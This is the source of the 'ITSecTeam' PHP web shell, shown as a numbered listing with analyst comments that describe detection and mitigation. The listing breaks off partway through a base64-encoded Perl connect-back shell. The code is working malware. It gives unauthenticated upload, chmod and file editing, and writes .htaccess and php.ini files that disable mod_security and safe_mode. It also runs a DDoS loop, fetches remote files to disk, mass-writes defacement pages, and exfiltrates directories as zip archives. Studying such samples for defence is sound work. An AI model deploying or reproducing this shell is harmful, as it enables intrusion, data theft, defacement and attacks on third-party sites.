1<?php
// Analyst note: page-level setup of a PHP web shell sample. Nothing in this
// listing checks a password, token or source address before the request
// handlers further down act on $_GET/$_POST/$_REQUEST values.
// session_start(): the session is later used by the SQL client code to keep
// the database server, user and password between requests.
2session_start();
// No execution time limit and no error output: long-running requests are not
// cut off and PHP warnings never reach the response or the default log level.
// This pair at the very top of an unfamiliar script in a web root is worth
// flagging during file review.
3set_time_limit(0);
4error_reporting(0);
// When magic quotes are active, undo the automatic escaping on every request
// superglobal so parameters reach the handlers exactly as sent.
5if (get_magic_quotes_gpc()) {
// Recursively applies stripslashes() to a scalar or to every element of a
// (possibly nested) array and returns the result.
6function stripslashes_deep($value) {
7 $value = is_array($value) ?
8 array_map('stripslashes_deep', $value) :
9 stripslashes($value);
10
11 return $value;
12 }
13$_POST = array_map('stripslashes_deep', $_POST);
14$_GET = array_map('stripslashes_deep', $_GET);
15$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
16$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
17}
// Self-removal: a request with do=remove unlinks this script. For incident
// response this means the file may be gone by the time the host is examined;
// the request itself (query string "do=remove") can still appear in the web
// server access log.
18if($_GET['do']=="remove"){
19unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
20}
// Pick the path separator for the host OS and normalise the document root to it.
21$basep=$_SERVER['DOCUMENT_ROOT'];
22if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
23$slash="\\";
24$basep=str_replace("/","\\",$basep);
25}else{
26$slash="/";
27$basep=str_replace("\\","/",$basep);
28}
// Second self-removal attempt, this time with the separator inserted between
// the working directory and SCRIPT_NAME.
29if($_GET['do']=="remove"){
30unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
31}
// The working directory is taken from the request's "address" parameter. Every
// later relative file operation (upload, file create, helper scripts written
// to disk) therefore lands wherever the requester pointed it, limited only by
// the web server account's filesystem permissions and any open_basedir setting.
32if ($_REQUEST['address']){
33if(is_readable($_REQUEST['address'])){
34chdir($_REQUEST['address']);}else{
35alert("Permission Denied !");}}
36$me=$_SERVER['PHP_SELF'];
37$formp="<form method=post action='".$me."'>";
38$formg="<form method=get action='".$me."'>";
39$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
// Upload handler: a multipart field named "filee" is moved into the current
// working directory under the client-supplied file name, with no check on
// extension, type or size. Detection: multipart POSTs carrying a "filee"
// field, followed by new files appearing beside web content. Mitigation is at
// the platform level: web-served directories not writable by the web server
// account, and no script execution in directories that must be writable.
40if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
41 if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
42 alert("File Upload Successful");
43 }else{
44alert("Permission Denied !");
45
46 }
47 }
48if(ini_get('disable_functions')){
49$disablef=ini_get('disable_functions');
50}else{
51$disablef="All Functions Enable";
52}
53if(ini_get('safe_mode')){
54$safe_modes="On";
55}else{
56$safe_modes="Off";
57}
58if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
59if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
60}
61$picdir='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';
62$picfile='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';
63$head='<style type="text/css">
64A:link {text-decoration: none}
65A:visited {text-decoration: none}
66A:active {text-decoration: none}
67A:hover {text-decoration: underline overline; color: 414141;}
68.focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
69</style><head>
70<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
71<title>iTSecTeam</title>
72</head><body topmargin="0" leftmargin="0" rightmargin="0"
73bgcolor="#f2f2f2"><div align="center">
74 <table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
75<tr>
76<td height="30" width="996">
77<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=��ҳ">��ҳ</a> -- <a href="?do=filemanager&address='.getcwd().'">�ļ�����</a> -- <a href="?do=cmd&address='.getcwd().'">����ִ��</a> -- <a href="?do=bc&address='.getcwd().'">����shell</a> --
78<a href="?do=bypasscmd&address='.getcwd().'">BypasS ����ִ��(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
79<a href="?do=bypassdir&address='.getcwd().'">�ƹ����ƶ��ļ�</a> -- <a href="?do=eval&address='.getcwd().'">
80PHP����</a> -- <a href="?do=db&address='.getcwd().'">���ݿ����</a> -- <a href="?do=����ת��&address='.getcwd().'">����ת��</a> -- <a href="?do=mail&address='.getcwd().'">�ʼ�ʹ��</a><a href="?do=info&address='.getcwd().'">
81<br>��������Ϣ</a> -- <a href="?do=d0slocal&address='.getcwd().'">��������</a> -- <a href="?do=dump&address='.getcwd().'">�������ݿ�</a> -- <a href="?do=mass&address='.getcwd().'">��������</a> -- <a href="?do=dlfile&address='.getcwd().'">�����ļ�</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">���дĿ¼</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
82</span></font></td></tr></table></div>
83<div align="center">
84<table id="table2" style="border-collapse: collapse; border-style:
85solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
86cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
87border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
88height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
89Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
90width="950" bgcolor="#e7e3de" height="10" valign="top">';
91$end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
92$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
// Emits a JavaScript alert() carrying $text. The text is concatenated into the
// <script> element without escaping; every caller visible in this listing
// passes a fixed string literal.
93function alert($text){
94echo "<script>alert('".$text."')</script>";
95}
96if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
97if(is_readable($_GET['address'].$_GET['filename'])){
98$opedit=fopen($_GET['address'].$_GET['filename'],"r");
99while(!feof($opedit))
100$data.=fread($opedit,9999);
101fclose($opedit);
102echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
103}else{alert("Permission Denied !");}}
// Formats a byte count for display: values of 1024 and above are divided into
// KB / MB / GB (powers of 1024) and rounded to two decimals; smaller values
// are returned with a " B" suffix. Returns a string in every branch.
104function sizee($size)
105{
106 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
107 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
108 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
109 else {$size = $size . " B";}
110 return $size;
111}
112if($_REQUEST['do']=='about'){
113echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>��ҳ Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
114<center>
115<PRE>
116
117 ______ ______ ____ ______
118/\__ _\/\__ _\/\ _`\ /\__ _\
119\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
120 \ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
121 \_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
122 /\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
123 \/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
124
125
126
127
128
129
130</PRE>
131
132
133".$end;exit;
134
135}
// Recursively deletes $dir. Returns true when the path does not exist; plain
// files and symlinks are unlinked rather than followed. When a child cannot be
// deleted its mode is set to 0777 and deletion is retried once; a second
// failure returns false. Forensic note: the chmod means a partly failed run
// can leave world-writable entries behind.
136function deleteDirectory($dir) {
137if (!file_exists($dir)) return true;
138if (!is_dir($dir) || is_link($dir)) return unlink($dir);
139foreach (scandir($dir) as $item) {
140if ($item == '.' || $item == '..') continue;
141if (!deleteDirectory($dir . "/" . $item)) {
142chmod($dir . "/" . $item, 0777);
143if (!deleteDirectory($dir . "/" . $item)) return false;
144};}return rmdir($dir);}
145
146function download($fileadd,$finame){
147$dlfilea=$fileadd.$finame;
148header("Content-Disposition: attachment; filename=" . $finame);
149header("Content-Type: application/download");
150header("Content-Length: " . filesize($dlfilea));
151flush();
152$fp = fopen($$dlfilea, "r");
153while (!feof($fp))
154{
155 echo fread($fp, 65536);
156 flush();
157}
158fclose($fp);
159}
160if($_GET['do']=="rename"){
161echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
162}
163
// Server-configuration tampering, selected by the "byapache" request value.
// Each branch opens its target with mode "w", so an existing file of that name
// in the working directory is truncated and replaced.
//   ofms  -> .htaccess containing an <IfModule mod_security.c> block that sets
//            directives to Off (directive names are partly masked on this page)
//   bysap -> .htaccess with "Options +FollowSymLinks" and a DirectoryIndex
//   sfadf -> php.ini with safe_mode=OFF and disable_functions=NONE
// Defender notes: an unexpected or recently modified .htaccess / php.ini in a
// content directory with any of these bodies is a strong indicator, and
// file-integrity monitoring on both names catches the write. Whether the files
// have any effect depends on server configuration; with Apache,
// "AllowOverride None" stops per-directory .htaccess files from being honoured.
164if ($_GET['byapache']=='ofms'){
165$fse=fopen(getcwd().$slash.".htaccess","w");
166fwrite($fse,'<IfModule mod_security.c>
167 Sec------Engine Off
168 Sec------ScanPOST Off
169</IfModule>');
170fclose($fse);
171}elseif ($_GET['byapache']=='bysap'){
172$fse=fopen(getcwd().$slash.".htaccess","w");
173fwrite($fse,'Options +FollowSymLinks
174DirectoryIndex Persian-Gulf-For-Ever.html');
175fclose($fse);
176}elseif ($_GET['byapache']=='sfadf'){
177$fse=fopen(getcwd().$slash."php.ini","w");
178fwrite($fse,'safe_mode=OFF
179disable_functions=NONE');
180fclose($fse);
181}
182if($_GET['do']=="apache"){
183echo $head.$formg.$nowaddress.'<p align="center">
184<select name=byapache>
185<option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
186<option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
187</select><br><input type=submit value=eXecute></form></p>'.$end;exit;
188}
189if($_GET['do']=="dd0s"){
190echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
191}
192
// Outbound request loop: while the loop condition (a comparison against the
// request's "timedd0" value) holds, the URL given in "urldd0" is opened through
// PHP's stream wrappers and read to the end; the data read is discarded.
// Defender notes: on the compromised host this shows up as sustained outbound
// connections from the web server process to a single destination. Egress
// filtering for the web tier and allow_url_fopen=Off both remove the capability.
193if($_GET['urldd0'] && $_GET['timedd0']){
194for ($id=0;$$id<$_GET['timedd0'];$id++){
195$fp=null;
196$contents=null;
197$fp=fopen($_GET['urldd0'],"rb");
198while (!feof($fp)) {
199 $contents .= fread($fp, 8192);
200}
201fclose($fp);
202}}
203if($_GET['do']=="dlfile"){
204echo $head.$formp.$nowaddress.'<p align="center">�����ļ�!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
205}
206function dirpe($addres){
207global $slash;
208$idd=0;
209if ($dirhen = @opendir($addres)) {
210while ($file = readdir($dirhen)) {
211$permdir=str_replace('//','/',$addres.$slash.$file);
212if($file!='.' && $file!='..' && is_dir($permdir)){
213if (is_writable($permdir)) {
214$dirdata[$idd]['filename']=$permdir;
215$idd++;
216}
217dirpe($permdir);
218 }
219 }
220 closedir($dirhen);
221 } else {
222 return ("notperm");
223 }
224 if ($dirdata){
225 return $dirdata;
226 }else{
227 return "notfound";
228
229 }
230}
231function dirpmass($addres,$massname,$masssource){
232global $slash;
233$idd=0;
234if ($dirhen = @opendir($addres)) {
235while ($file = readdir($dirhen)) {
236$permdir=str_replace('//','/',$addres.$slash.$file);
237if($file!='.' && $file!='..' && is_dir($permdir)){
238if (is_writable($permdir)) {
239if ($fm=fopen($permdir.$slash.$massname,"w")){
240fwrite($fm,$masssource);
241fclose($fm);
242$dirdata[$idd]['filename']=$permdir;
243}
244
245$idd++;
246}
247dirpmass($permdir);
248 }
249 }
250 closedir($dirhen);
251 } else {
252 return ("notperm");
253 }
254 if ($dirdata){
255 return $dirdata;
256 }else{
257 return "notfound";
258
259 }
260}
261if($_GET['do']=="perm"){
262echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
263}
264if ($_POST['affw']){
265$arrfilelist=dirpe($_POST['affw']);
266if ($arrfilelist=='notfound'){
267alert("Not Found !");
268}elseif($arrfilelist=='notperm'){
269alert("Permission Denied !");
270}else{
271foreach ($arrfilelist as $tmpdir){
272 if ($coi %2){
273$colort='"#e7e3de"';
274}else{
275$colort='"#e4e1de"';}
276$coi++;
277$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
278<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
279<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
280<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
281}
282echo $head.'
283<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
284<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
285</tr></table>'.$permdir.'</table>
286<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
287<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
288<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
289<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
290<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
291<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
292<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
293<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
294<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
295<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
296<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
297<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
298<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
299<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
300<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
301<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
302<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
303<font face="Tahoma" style="font-size: 10pt">
304<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
305<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
306<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
307<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
308<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
309<td width="200" align="right" valign="top">
310<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
311<td width="750"><font face="Tahoma" style="font-size: 10pt">
312<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
313}}
314if($_GET['do']=="mass"){
315echo $head.$formp.'<p align="center">[��������]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
316}
317if ($_POST['mffw']){
318$arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
319if ($arrfilelist=='notfound'){
320alert("Not Found !");
321}elseif($arrfilelist=='notperm'){
322alert("Permission Denied !");
323}else{
324foreach ($arrfilelist as $tmpdir){
325 if ($coi %2){
326$colort='"#e7e3de"';
327}else{
328$colort='"#e4e1de"';}
329$coi++;
330$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
331<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
332<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
333<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
334}
335echo $head.'
336<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
337<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
338</tr></table>'.$permdir.'</table>
339<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
340<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
341<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
342<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
343<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
344<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
345<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
346<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
347<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
348<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
349<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
350<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
351<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
352<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
353<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
354<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
355<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
356<font face="Tahoma" style="font-size: 10pt">
357<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
358<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
359<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
360<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
361<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
362<td width="200" align="right" valign="top">
363<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
364<td width="750"><font face="Tahoma" style="font-size: 10pt">
365<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
366}}
// Remote fetch to disk: the URL in POST "adlr" is opened for reading and
// copied in 8 KiB chunks to the path formed from POST "adsr" plus the URL's
// basename. Neither value is validated.
// Defender notes: this is how additional tooling is typically staged on a host
// once a shell is present. Look for outbound fetches by the web server process
// and for new files whose names match the last path segment of the fetched
// URL. allow_url_fopen=Off and default-deny egress from the web tier block it.
367if($_POST['adlr'] && $_POST['adsr']){
368$url = $_POST['adlr'];
369$newfname = $_POST['adsr'] . basename($url);
370$file = fopen ($url, "rb");
371if ($file) {
372 $newf = fopen ($newfname, "wb");
373 if ($newf)
374 while(!feof($file)) {
375 fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
376 }
377 alert("File Downloaded Success");
378}else{alert("Can Not Open File");}
379if ($file) {
380 fclose($file);
381}
382if ($newf) {
383 fclose($newf);
384}
385}
386if($_GET['do']=="down" and $_GET['type']=='file'){
387download($_GET['address'],$_GET['filename']);}
388if($_GET['do']=="down" and $_GET['type']=='dir'){
389class zipfile
390{
391var $datasec = array();
392var $ctrl_dir = array();
393var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
394var $old_offset = 0;
395function add_dir($name)
396{
397$name = str_replace("\\", "/", $name);
398$fr = "\x50\x4b\x03\x04";
399$fr .= "\x0a\x00";
400$fr .= "\x00\x00";
401$fr .= "\x00\x00";
402$fr .= "\x00\x00\x00\x00";
403$fr .= pack("V",0);
404$fr .= pack("V",0);
405$fr .= pack("V",0);
406$fr .= pack("v", strlen($name) );
407$fr .= pack("v", 0 );
408$fr .= $name;
409$fr .= pack("V",$crc);
410$fr .= pack("V",$c_len);
411$fr .= pack("V",$unc_len);
412$this -> datasec[] = $fr;
413$new_offset = strlen(implode("", $this->datasec));
414$cdrec = "\x50\x4b\x01\x02";
415$cdrec .="\x00\x00";
416$cdrec .="\x0a\x00";
417$cdrec .="\x00\x00";
418$cdrec .="\x00\x00";
419$cdrec .="\x00\x00\x00\x00";
420$cdrec .= pack("V",0);
421$cdrec .= pack("V",0);
422$cdrec .= pack("V",0);
423$cdrec .= pack("v", strlen($name) );
424$cdrec .= pack("v", 0 );
425$cdrec .= pack("v", 0 );
426$cdrec .= pack("v", 0 );
427$cdrec .= pack("v", 0 );
428$ext = "\x00\x00\x10\x00";
429$ext = "\xff\xff\xff\xff";
430$cdrec .= pack("V", 16 );
431$cdrec .= pack("V", $this -> old_offset );
432$this -> old_offset = $new_offset;
433$cdrec .= $name;
434$this -> ctrl_dir[] = $cdrec;
435}
436function add_file($data, $name)
437{
438$name = str_replace("\\", "/", $name);
439$fr = "\x50\x4b\x03\x04";
440$fr .= "\x14\x00";
441$fr .= "\x00\x00";
442$fr .= "\x08\x00";
443$fr .= "\x00\x00\x00\x00";
444$unc_len = strlen($data);
445$crc = crc32($data);
446$zdata = gzcompress($data);
447$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
448$c_len = strlen($zdata);
449$fr .= pack("V",$crc);
450$fr .= pack("V",$c_len);
451$fr .= pack("V",$unc_len);
452$fr .= pack("v", strlen($name) );
453$fr .= pack("v", 0 );
454$fr .= $name;
455$fr .= $zdata;
456$fr .= pack("V",$crc);
457$fr .= pack("V",$c_len);
458$fr .= pack("V",$unc_len);
459$this -> datasec[] = $fr;
460$new_offset = strlen(implode("", $this->datasec));
461$cdrec = "\x50\x4b\x01\x02";
462$cdrec .="\x00\x00";
463$cdrec .="\x14\x00";
464$cdrec .="\x00\x00";
465$cdrec .="\x08\x00";
466$cdrec .="\x00\x00\x00\x00";
467$cdrec .= pack("V",$crc);
468$cdrec .= pack("V",$c_len);
469$cdrec .= pack("V",$unc_len);
470$cdrec .= pack("v", strlen($name) );
471$cdrec .= pack("v", 0 );
472$cdrec .= pack("v", 0 );
473$cdrec .= pack("v", 0 );
474$cdrec .= pack("v", 0 );
475$cdrec .= pack("V", 32 );
476$cdrec .= pack("V", $this -> old_offset );
477$this -> old_offset = $new_offset;
478$cdrec .= $name;
479$this -> ctrl_dir[] = $cdrec;
480}
481function file() {
482$data = implode("", $this -> datasec);
483$ctrldir = implode("", $this -> ctrl_dir);
484return
485$data.
486$ctrldir.
487$this -> eof_ctrl_dir.
488pack("v", sizeof($this -> ctrl_dir)).
489pack("v", sizeof($this -> ctrl_dir)).
490pack("V", strlen($ctrldir)).
491pack("V", strlen($data)).
492"\x00\x00";
493}
494}
495$dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
496$zipfile = new zipfile();
497function get_files_from_folder($directory, $put_into) {
498global $zipfile;
499if ($handle = opendir($directory)) {
500while (false !== ($file = readdir($handle))) {
501if (is_file($directory.$file)) {
502$fileContents = file_get_contents($directory.$file);
503$zipfile->add_file($fileContents, $put_into.$file);
504} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
505$zipfile->add_dir($put_into.$file.'/');
506get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
507}
508}
509}
510closedir($handle);
511}
// Directory exfiltration tail: the requested folder has been packed into an
// in-memory zip by get_files_from_folder(); the archive is sent to the client
// as an attachment named "<dirname>-<yy-mm-dd>.zip".
512$datedl=date("y-m-d");
513get_files_from_folder($dlfolder,'');
514header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
515header("Content-Type: application/download");
516header("Content-Length: " . strlen($zipfile -> file()));
517flush();
518echo $zipfile -> file();
// The same archive is then also written into the current working directory
// under that name. Forensic note: leftover "<dirname>-<yy-mm-dd>.zip" files on
// disk indicate which directories were packaged and on what date, and large
// "application/download" responses from this script mark the transfer in logs.
519$filename = $_GET['dirname']."-".$datedl.".zip";
520$fd = fopen ($filename, "wb");
521$out = fwrite ($fd, $zipfile -> file());
522fclose ($fd);
523}
524if ($_REQUEST['cdirname']){
525if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
526function bcn($ipbc,$pbc){
527$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
528NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
